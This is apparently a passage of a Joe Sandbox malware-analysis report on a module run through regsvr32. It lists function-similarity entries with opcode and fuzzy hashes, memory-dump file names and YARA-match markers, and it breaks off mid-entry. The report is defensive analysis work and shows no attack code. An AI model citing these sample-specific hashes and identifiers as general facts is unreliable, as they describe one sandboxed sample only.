                                                                                                                                      • API ID: InfoLocale
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2299586839-0
                                                                                                                                      • Opcode ID: 502a65142465a1b9b121244362b20e71b6ae70508435106b2b95459646a177ab
                                                                                                                                      • Instruction ID: bd2025baffa91417edc2058581260a2083fa520317d5a5feb11840ef89ca56d7
                                                                                                                                      • Opcode Fuzzy Hash: 502a65142465a1b9b121244362b20e71b6ae70508435106b2b95459646a177ab
                                                                                                                                      • Instruction Fuzzy Hash: 49E06522E1C68185F730E710E8117AA27D0AFB8758F900273D69DA66A5EE6DD2568F02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EnumLocalesSystem
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2099609381-0
                                                                                                                                      • Opcode ID: a3acadd2f008454ed6638a5ec196b6424420b15def5e390d94227f08142a8bc9
                                                                                                                                      • Instruction ID: c8e1426b934dc92b775adfc09bfcc0221c7c6e1405461316a3f4d25977ecc3e8
                                                                                                                                      • Opcode Fuzzy Hash: a3acadd2f008454ed6638a5ec196b6424420b15def5e390d94227f08142a8bc9
                                                                                                                                      • Instruction Fuzzy Hash: 84E08667E1460547FB58CB61D44437432D1EFA8B09F088472CA0C911D5EFFCC596CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: cYte
                                                                                                                                      • API String ID: 0-489798635
                                                                                                                                      • Opcode ID: 4acd880b1b9242ae3f66c3fdc32505bc5e4dc901df3d7cd7ffb66f12f89e51a1
                                                                                                                                      • Instruction ID: 4bcad34f3ef31740aa8133b8dde5a269bb367cd09133d205a83695970592d01c
                                                                                                                                      • Opcode Fuzzy Hash: 4acd880b1b9242ae3f66c3fdc32505bc5e4dc901df3d7cd7ffb66f12f89e51a1
                                                                                                                                      • Instruction Fuzzy Hash: C4B1E570904A0C9FCB99DFA8D4C96DDBFB1FB48354F908119F806AB294D774998ACF81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Pc
                                                                                                                                      • API String ID: 0-2609325410
                                                                                                                                      • Opcode ID: 1a0088ecf8094bc96bd3fe6dd6dc82c472572739438acd9534c77a0a59272c42
                                                                                                                                      • Instruction ID: 12b923e2fd3f69615379d54222b7898fdcc3de1fee72b8e179f5c4c977b11f8e
                                                                                                                                      • Opcode Fuzzy Hash: 1a0088ecf8094bc96bd3fe6dd6dc82c472572739438acd9534c77a0a59272c42
                                                                                                                                      • Instruction Fuzzy Hash: 4CC188B6502749CFCB88DF68C69A59E7BF1FF55308F004129FC0A9A660D374D929CB48
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: xDC
                                                                                                                                      • API String ID: 0-90241050
                                                                                                                                      • Opcode ID: 1794493f14346c80bf95ebec7e4fc927d8b172e8d91b7fcff559d0595d0365ee
                                                                                                                                      • Instruction ID: 9121b1bc5c885adbeef7a29f5b0494aad7ac2618abc594bea640adf26706a648
                                                                                                                                      • Opcode Fuzzy Hash: 1794493f14346c80bf95ebec7e4fc927d8b172e8d91b7fcff559d0595d0365ee
                                                                                                                                      • Instruction Fuzzy Hash: F391387052065CEBDB99DF68C8CAADD3BA0FB48394F906219FC4287250C775D9C98B86
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: g >
                                                                                                                                      • API String ID: 0-3862707646
                                                                                                                                      • Opcode ID: ed648581161f49faafb3551504090fa0bdf2ce44a31b7bcfa2a0e2750c151a25
                                                                                                                                      • Instruction ID: 455282f08292131e945dcc730a648b96f9dba3dd8fa54dedd401ba7ae830fef0
                                                                                                                                      • Opcode Fuzzy Hash: ed648581161f49faafb3551504090fa0bdf2ce44a31b7bcfa2a0e2750c151a25
                                                                                                                                      • Instruction Fuzzy Hash: DEA1E5B1604649CFCB98DF28C4896DE7BE0FF48358F41412AFD0A9B255C774DAA8CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 2
                                                                                                                                      • API String ID: 0-2012265552
                                                                                                                                      • Opcode ID: fb4f60d061479647d3fac6d2f693c32068a5ad75f13adf9d903438d0578f57c4
                                                                                                                                      • Instruction ID: 4926f2c2e7b01a1509be6dde787c5073208d3019f4660081853cabf743aa6d2d
                                                                                                                                      • Opcode Fuzzy Hash: fb4f60d061479647d3fac6d2f693c32068a5ad75f13adf9d903438d0578f57c4
                                                                                                                                      • Instruction Fuzzy Hash: 23A1467490660CDFCB69DFA8C0856CDBBF2FF18344F1081AAE816A7261D774C619CB89
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Wcl
                                                                                                                                      • API String ID: 0-2623992880
                                                                                                                                      • Opcode ID: f4aab810873131842688b8816ae552eda5867b61779d557f5a81b893f1e00e3f
                                                                                                                                      • Instruction ID: 6785441b261b06c1a3a09f49601167733b22bb672c53a20dcfeae34723d14519
                                                                                                                                      • Opcode Fuzzy Hash: f4aab810873131842688b8816ae552eda5867b61779d557f5a81b893f1e00e3f
                                                                                                                                      • Instruction Fuzzy Hash: DCB17BB990364DCFCB68CF78D58A59D7BF1AF64308F204119FC259A266D3B0D629CB48
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ws8
                                                                                                                                      • API String ID: 0-2196714860
                                                                                                                                      • Opcode ID: 5d33fb8a3b51542eaa6130f047a5a21fcb70befd8ff2f8c5da0624ee0b386558
                                                                                                                                      • Instruction ID: b480ef2199d1fafa288ff61c3bcffdce570952497d21d470c9db593eaacbee88
                                                                                                                                      • Opcode Fuzzy Hash: 5d33fb8a3b51542eaa6130f047a5a21fcb70befd8ff2f8c5da0624ee0b386558
                                                                                                                                      • Instruction Fuzzy Hash: 54711A70A0470E8FDB59DFA8C45AAEFBBF2FB54348F004119D806A7291DB749A19CBC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: p/g
                                                                                                                                      • API String ID: 0-1786412500
                                                                                                                                      • Opcode ID: 12e0429f3d25b53aa03a660b5e037e54bcd2ac93df657abae010b2d02fa62e0c
                                                                                                                                      • Instruction ID: ede728f5e2ba0833d242d52ca27ad93f20c36497480e8c5f25a004cbad49378e
                                                                                                                                      • Opcode Fuzzy Hash: 12e0429f3d25b53aa03a660b5e037e54bcd2ac93df657abae010b2d02fa62e0c
                                                                                                                                      • Instruction Fuzzy Hash: F58108B050434E8FCB88DF68D88A6DE7FF0FB58358F105659E85A96250D3B8D694CF84
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: %
                                                                                                                                      • API String ID: 0-3714942587
                                                                                                                                      • Opcode ID: 4a5e4fe18fa17051425459feb0137b81b0d343578dbe0cd5a85f108800ca0619
                                                                                                                                      • Instruction ID: d5d5bf94d11651037a836977de8f66422f038c9f5d7a5f915f0cc542ec650b78
                                                                                                                                      • Opcode Fuzzy Hash: 4a5e4fe18fa17051425459feb0137b81b0d343578dbe0cd5a85f108800ca0619
                                                                                                                                      • Instruction Fuzzy Hash: 5A516974606608CBDB69DF38D4D57A937E1EF68305F20412DF866C72A2DB70D9258B88
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: A.}
                                                                                                                                      • API String ID: 0-2880059976
                                                                                                                                      • Opcode ID: 9010837fa6b706847bc4c7b3c9088da85304bc8742fe6f892a790101183beb2f
                                                                                                                                      • Instruction ID: 2f0cd8bb00c33d355f5bc07b1ff950bf82d6730f12d3cb6082a6ef1b734ff39e
                                                                                                                                      • Opcode Fuzzy Hash: 9010837fa6b706847bc4c7b3c9088da85304bc8742fe6f892a790101183beb2f
                                                                                                                                      • Instruction Fuzzy Hash: 8E618FB190078E8FCF48DF68C88A5DE7BB1FB58318F004A1DE86696250D7B49A65CF94
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 0#
                                                                                                                                      • API String ID: 0-456275806
                                                                                                                                      • Opcode ID: 2a5e92d38432702302bb854991be2d1fec0b328a8259ee1ce7fe1531fc30a302
                                                                                                                                      • Instruction ID: 4563f3e02f76dde2de765371aa44af8a356bdaf4307918038d119139e73a9611
                                                                                                                                      • Opcode Fuzzy Hash: 2a5e92d38432702302bb854991be2d1fec0b328a8259ee1ce7fe1531fc30a302
                                                                                                                                      • Instruction Fuzzy Hash: A6415E70608B488FC768DF19D4897AABBF1FB99301F404A6DE58AC7251DB70D849CB82
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: n)
                                                                                                                                      • API String ID: 0-1227437150
                                                                                                                                      • Opcode ID: f07ab33c2aa16265c73684704b65c3edc8d50a8e8d1ddfe7d0f50fe867e83bf1
                                                                                                                                      • Instruction ID: dd456011ca79f85f31d8ff0d6df60f6896318ebd7e2af4f5172cd91629f08304
                                                                                                                                      • Opcode Fuzzy Hash: f07ab33c2aa16265c73684704b65c3edc8d50a8e8d1ddfe7d0f50fe867e83bf1
                                                                                                                                      • Instruction Fuzzy Hash: 9761ADB090074E8FCB48DF68D58A5CE7FF0FB68398F204219E856A6260D37496A5CFC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: H&0
                                                                                                                                      • API String ID: 0-1691334370
                                                                                                                                      • Opcode ID: 176f3dafecf3041be65652fa330368668244bab9b7972e65e66ffc3ed07b0be6
                                                                                                                                      • Instruction ID: 434fd06cb4e7b9e5ef59c8cf231445956357c0a0e2562e482aef1b34ca23bdad
                                                                                                                                      • Opcode Fuzzy Hash: 176f3dafecf3041be65652fa330368668244bab9b7972e65e66ffc3ed07b0be6
                                                                                                                                      • Instruction Fuzzy Hash: F8511970519784ABD7D9CF28C4C5B5EBBE0FB88794F90691EF486C62A0CB74C9498B03
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: <+o
                                                                                                                                      • API String ID: 0-2035106886
                                                                                                                                      • Opcode ID: a127c5cda714885b89af0befeec2260f70d516272a3ffbf2c9e998cd35b08532
                                                                                                                                      • Instruction ID: 908cc80fe280ddd0bfa2415e6bae89ce11b1f5b72da4428c53a3215ac7c7145d
                                                                                                                                      • Opcode Fuzzy Hash: a127c5cda714885b89af0befeec2260f70d516272a3ffbf2c9e998cd35b08532
                                                                                                                                      • Instruction Fuzzy Hash: 7A51DFB090034E8BCB48CF68C9965DE7BB0FB58348F11861DEC26AA350D3B4D664CF95
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 2d
                                                                                                                                      • API String ID: 0-3866551247
                                                                                                                                      • Opcode ID: 21f6d5c278180fa64e04e12198f4d62966834cfebc9beba359b958e849a1d965
                                                                                                                                      • Instruction ID: 258b54a6104a0115c80ff1d617aa7636393a642c0cf89d14f7baa21f525a3413
                                                                                                                                      • Opcode Fuzzy Hash: 21f6d5c278180fa64e04e12198f4d62966834cfebc9beba359b958e849a1d965
                                                                                                                                      • Instruction Fuzzy Hash: 4641CFB05087858FD358DF68C58A61AFBF1BBCA344F108A1EF685CB260D7B6D945CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ZF{;
                                                                                                                                      • API String ID: 0-2351138993
                                                                                                                                      • Opcode ID: 1a3b70ac63407bc6b31dbd99811dd9b011c38cdabefff78aa14352df61b26e81
                                                                                                                                      • Instruction ID: 7873f037b774218c73d9d67b0eeaf548a3a2a69e6d8f7c9b30684cba1c01e4e1
                                                                                                                                      • Opcode Fuzzy Hash: 1a3b70ac63407bc6b31dbd99811dd9b011c38cdabefff78aa14352df61b26e81
                                                                                                                                      • Instruction Fuzzy Hash: 525192B180034A8FCB48CF68D48A5DE7FB0FB68398F20461DF956A6250D3B596A4CFD5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: o^
                                                                                                                                      • API String ID: 0-3380573087
                                                                                                                                      • Opcode ID: 0d6f3437d03fe5aa4f51e8e74fa4409d34d0e7854ad8eda007dad4bfdfa39413
                                                                                                                                      • Instruction ID: 59a9f6ae0c87b179395b4bbd7662f2404235addd18437060f8b1d9c1d0f8b2e4
                                                                                                                                      • Opcode Fuzzy Hash: 0d6f3437d03fe5aa4f51e8e74fa4409d34d0e7854ad8eda007dad4bfdfa39413
                                                                                                                                      • Instruction Fuzzy Hash: 97419FB091034A9FCB48DF68C4865CEBFB0FB68394F20561AF856A6250D3B4D6A4CFD5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 8N
                                                                                                                                      • API String ID: 0-1657423088
                                                                                                                                      • Opcode ID: c7b73ac620a1de8d380d3e919fde74086c8d3eb6f51cee4e1f73d7d71f9b17a5
                                                                                                                                      • Instruction ID: 05e8e8e61cf54c40f354227930f27795623571b92907d2ce5de0c79af9b5eb72
                                                                                                                                      • Opcode Fuzzy Hash: c7b73ac620a1de8d380d3e919fde74086c8d3eb6f51cee4e1f73d7d71f9b17a5
                                                                                                                                      • Instruction Fuzzy Hash: 3041B2B180078A8FCF48DF68D88A5DE7BF0FB48344F515619F82AA6250D3B49664CF94
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: J3n
                                                                                                                                      • API String ID: 0-3694000235
                                                                                                                                      • Opcode ID: 5e0585a393d7b877ef62559883b768be0e35881de92711842f1faa0fdb5b3090
                                                                                                                                      • Instruction ID: fbc63d1771dd8068db465c214aa1fa6fe3c32017f13d31a40a539671eb8e3db3
                                                                                                                                      • Opcode Fuzzy Hash: 5e0585a393d7b877ef62559883b768be0e35881de92711842f1faa0fdb5b3090
                                                                                                                                      • Instruction Fuzzy Hash: 9241B2B090034A8FCB48CF64D48A5DEBFF0FB68398F104619E819A6250D3B496A5CFD5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: c&A
                                                                                                                                      • API String ID: 0-649646960
                                                                                                                                      • Opcode ID: 222d628d9e4dbd3e938f419e6eccfde97dede3f6fc3ed5f8b1cf47718be42e18
                                                                                                                                      • Instruction ID: 5c1e29145451eb3f41bdf5aebc87db8614fe3fe022aa4abe865b5bb925589833
                                                                                                                                      • Opcode Fuzzy Hash: 222d628d9e4dbd3e938f419e6eccfde97dede3f6fc3ed5f8b1cf47718be42e18
                                                                                                                                      • Instruction Fuzzy Hash: A041B2B490038E8FCF48DF68D8465DE7BB0FF58348F114619E865A6250D3B8D665CF85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: (3
                                                                                                                                      • API String ID: 0-2570504824
                                                                                                                                      • Opcode ID: a8e5f93200cbe41d1aa1f83add337e38aaec9fa9aeab5943e76885fb2eb57509
                                                                                                                                      • Instruction ID: 078cae481ecab5ebae8a44fc1aa70e5a526d9ef7cdb5a4e390aeab476efd0bb7
                                                                                                                                      • Opcode Fuzzy Hash: a8e5f93200cbe41d1aa1f83add337e38aaec9fa9aeab5943e76885fb2eb57509
                                                                                                                                      • Instruction Fuzzy Hash: 8641E1B190034E8BCB48DF65C89A4EE7FB0FB58388F10461DE856AB250D37496A9CFD5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: [r\^
                                                                                                                                      • API String ID: 0-4041245994
                                                                                                                                      • Opcode ID: 7e09be878869778b676359d511607d642bff81e0c723db1b86f2cce54c765f10
                                                                                                                                      • Instruction ID: bef136deadb7757a9af36730b388b650d276232742e73576b67fc962b3bf4495
                                                                                                                                      • Opcode Fuzzy Hash: 7e09be878869778b676359d511607d642bff81e0c723db1b86f2cce54c765f10
                                                                                                                                      • Instruction Fuzzy Hash: A841E2B090034E8FCB48DFA4D48A5DE7FB1FB58358F10861DE85AA6210C3B896A4CFD5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: #X
                                                                                                                                      • API String ID: 0-1684620495
                                                                                                                                      • Opcode ID: e5059ebb106ab31542f79bed70f85174c6c5fb64cd94bc4155e3ee01b83e8653
                                                                                                                                      • Instruction ID: c074d48008b4f0de6335b08329d09b3dcf7b4425e670a70b5eb694557c772c54
                                                                                                                                      • Opcode Fuzzy Hash: e5059ebb106ab31542f79bed70f85174c6c5fb64cd94bc4155e3ee01b83e8653
                                                                                                                                      • Instruction Fuzzy Hash: CD31C27050074A8BCF48DF68C48A5DE7FA1BB68388F204619F85A96250D3B896A9CBC4
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: [[x
                                                                                                                                      • API String ID: 0-2553898450
                                                                                                                                      • Opcode ID: fce498f01d1264328632f2ce3828285d2b3a4cfcf13af4523760d9f610b529f8
                                                                                                                                      • Instruction ID: a8e0a129d75fff214b9f34755e9293911d3f443417a5185f62d90841b3dbcaf2
                                                                                                                                      • Opcode Fuzzy Hash: fce498f01d1264328632f2ce3828285d2b3a4cfcf13af4523760d9f610b529f8
                                                                                                                                      • Instruction Fuzzy Hash: 8031AF701087848BD759DF68D48A51EFFF1FBC5398F500A0CF68286260D7B6E889CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: g\&
                                                                                                                                      • API String ID: 0-1994035986
                                                                                                                                      • Opcode ID: f1cd2deb5ac8493e30d5546e6bad4ad0a2e3582185550e3a432f48c3f1068d26
                                                                                                                                      • Instruction ID: 78d7b7b30cf9cde697684abc63e3144e4f3c104511914dfd36499d518091e057
                                                                                                                                      • Opcode Fuzzy Hash: f1cd2deb5ac8493e30d5546e6bad4ad0a2e3582185550e3a432f48c3f1068d26
